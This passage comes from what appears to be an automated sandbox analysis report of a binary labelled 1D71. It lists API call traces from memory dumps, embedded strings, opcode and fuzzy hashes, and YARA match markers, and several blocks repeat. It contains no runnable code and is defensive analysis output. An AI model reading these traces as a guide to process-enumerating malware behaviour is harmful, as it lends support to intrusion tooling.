                                                              • Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                              • Instruction Fuzzy Hash: E701AD71A00224E7CB15AFA1DC84BEE7BA5AF00705F10405BEC01AB200E7B896458EB5
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000), ref: 02494719
                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02494734
                                                              • CloseHandle.KERNEL32(00000000), ref: 0249473B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0249476E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                                              • String ID:
                                                              • API String ID: 4028989146-0
                                                              • Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
                                                              • Instruction ID: 5685b57771a45a69d2911511b14ebf5ab0383253a88ab7401b7a870fc29fe1e1
                                                              • Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
                                                              • Instruction Fuzzy Hash: 19F0F6B09016192FEB20AB74DC8CBEABBB9DF05704F0001E5FA55D7280DBF088858BE0
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0040880C
                                                              • memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852
                                                                • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$memcpy
                                                              • String ID: string too long
                                                              • API String ID: 2304785028-2556327735
                                                              • Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                              • Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
                                                              • Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                              • Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02478B1A
                                                                • Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A41F
                                                                • Part of subcall function 0249A40A: __CxxThrowException@8.LIBCMT ref: 0249A434
                                                                • Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A445
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                              • String ID: yxxx$yxxx
                                                              • API String ID: 1823113695-1021751087
                                                              • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                              • Instruction ID: 2408fc04d8a96cb2a387bac7c58230571d458a4226e4e40a65a9df9851f8144e
                                                              • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                              • Instruction Fuzzy Hash: 523189B5E005199BCB08DF58C8956AEBBB6EB88310F14826AE915AF344D734E901CBD1
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00408AA5
                                                                • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                                • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                              • memcpy.MSVCRT(?,?,?), ref: 00408AEF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                                              • String ID: string too long
                                                              • API String ID: 2475949303-2556327735
                                                              • Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                              • Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
                                                              • Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
                                                              • Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02495BA9
                                                                • Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A41F
                                                                • Part of subcall function 0249A40A: __CxxThrowException@8.LIBCMT ref: 0249A434
                                                                • Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A445
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02495BBC
                                                              Strings
                                                              • Sec-WebSocket-Version: 13, xrefs: 02495BAE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                              • String ID: Sec-WebSocket-Version: 13
                                                              • API String ID: 963545896-4220314181
                                                              • Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                              • Instruction ID: 31f39f7832120b1a7463e15e1ca8e7f150951fb032f5bc632a74e2d6cd9dce44
                                                              • Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
                                                              • Instruction Fuzzy Hash: FA1182703047508BCB328F2CE940B0A7BE2AB82710FB40A6FE491DB785D761D841C791
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00408BBF
                                                                • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                                • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                              • memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5
                                                              Strings
                                                              • invalid string position, xrefs: 00408BBA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                                              • String ID: invalid string position
                                                              • API String ID: 655285616-1799206989
                                                              • Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                              • Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
                                                              • Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
                                                              • Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398
                                                              APIs
                                                                • Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
                                                                • Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9
                                                                • Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
                                                                • Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
                                                                • Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
                                                              • lstrcat.KERNEL32(00000000), ref: 0248C5BC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                              • String ID:
                                                              • API String ID: 2910713533-0
                                                              • Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                              • Instruction ID: 7cebde6e71c35603b835b0ec37180e641ef40920a7385c177ecc85d683c145c8
                                                              • Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
                                                              • Instruction Fuzzy Hash: 7A316971E10265DBCF24EFA5CC84A9EB7F6AF44308F1444ABD814AB650DB74DA41DF60
                                                              APIs
                                                                • Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
                                                                • Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9
                                                                • Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
                                                                • Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
                                                                • Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
                                                              • lstrcat.KERNEL32(00000000), ref: 0248C5BC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                              • String ID:
                                                              • API String ID: 2910713533-0
                                                              • Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                              • Instruction ID: dad57acc9479fcee17df5ff1be79e528d5dc8418c0c5332742bf9d111a19b871
                                                              • Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
                                                              • Instruction Fuzzy Hash: B2317871E10265DBCF24EFA5CC84A9EB7F2AF44308F14446BD814AB611DB74DA42DFA0
                                                              APIs
                                                                • Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
                                                                • Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9
                                                                • Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
                                                                • Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
                                                                • Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
                                                              • lstrcat.KERNEL32(00000000), ref: 0248C5BC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                              • String ID:
                                                              • API String ID: 2910713533-0
                                                              • Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                              • Instruction ID: 6cc2eba8d89054c588752b1a60137795d63c19e4b89697da8e18907bc53cb90b
                                                              • Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
                                                              • Instruction Fuzzy Hash: 2F315A71E10268DBCF24EFA5CC84A9EB7F2AF44308F1444ABD814AB651DB74DA41DFA0
                                                              APIs
                                                                • Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
                                                                • Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9
                                                                • Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
                                                                • Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
                                                                • Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
                                                              • lstrcat.KERNEL32(00000000), ref: 0248C5BC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                              • String ID:
                                                              • API String ID: 2910713533-0
                                                              • Opcode ID: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                              • Instruction ID: 4b9b4eea114c58dccddd93ebaa6a896adb986954ca8b5129f011c9f8147d7a8f
                                                              • Opcode Fuzzy Hash: c119ec92df3871871dffaf0474d1d7a138caf980c1379f325d92db08c09d55e7
                                                              • Instruction Fuzzy Hash: AD314771E102649BDF24EFB5CC84A9EBBF2AF84308F14446BD814AB651DB74DA42DF60
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000), ref: 00421581
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 004215B9
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 004215F1
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00421629
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                              • Instruction ID: 80d308abde563585a592328bb7eba962bc113a2ea9b505a2ad5a72594fb3347d
                                                              • Opcode Fuzzy Hash: 7249e6668abafaf4035fa494e08afe422198d967ac41c3c40e0ecb1d77fcd613
                                                              • Instruction Fuzzy Hash: EE211EB4701B029BD724DF3AD958A17B7F5BF54700B444A2EA486D7BA0DB78F840CBA4
                                                              APIs
                                                                • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                                • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                                • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                                • Part of subcall function 00401510: lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00401437
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00401459
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0040147B
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 004014DF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                              • Instruction ID: 368a80f0553ecf631160e054036b62fbe6d7ddfceb8bd69434bdfc69ba453b92
                                                              • Opcode Fuzzy Hash: bea906036c5024bdad2b439cbe047c88e0159a543058b9686e88131c65337636
                                                              • Instruction Fuzzy Hash: 4A31A575A01B029FC728DF3AD588957BBE5BF48704700492EA956D3BA0DB74F811CB94
                                                              APIs
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000), ref: 02471794
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717B6
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717D8
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717FA
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247169E
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024716C0
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024716E2
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471746
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                              • Instruction ID: 766c5db6cba4c899d4a7117cd1b19d9887c966880557d0b52cfe1b76c506300d
                                                              • Opcode Fuzzy Hash: 171f9c098ff936ecfc8a21f2e49e70ffbd26c7e9154b77e38915ce96a98a388b
                                                              • Instruction Fuzzy Hash: 68318274A11B42AFD724DF3AC988996BBE5BF49705704492E98AAC3B50DB74F410CF90
                                                              APIs
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000), ref: 02471794
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717B6
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717D8
                                                                • Part of subcall function 02471777: lstrcpy.KERNEL32(00000000,?), ref: 024717FA
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247169E
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024716C0
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024716E2
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471746
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                              • Instruction ID: bdec70f25dfcaadc5ec983c0d229c25c7ea21aae892e60d6a75f572ff50471a3
                                                              • Opcode Fuzzy Hash: adf978454c3d5bdd2a26ceaf3544a8e4f67307e827b9ebe409f1eb4b0b822894
                                                              • Instruction Fuzzy Hash: 85318274A11B42AFD724DF3AC988996B7F5BF48705704492E98AAC3B50DB74F411CF90
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000), ref: 024917E8
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02491820
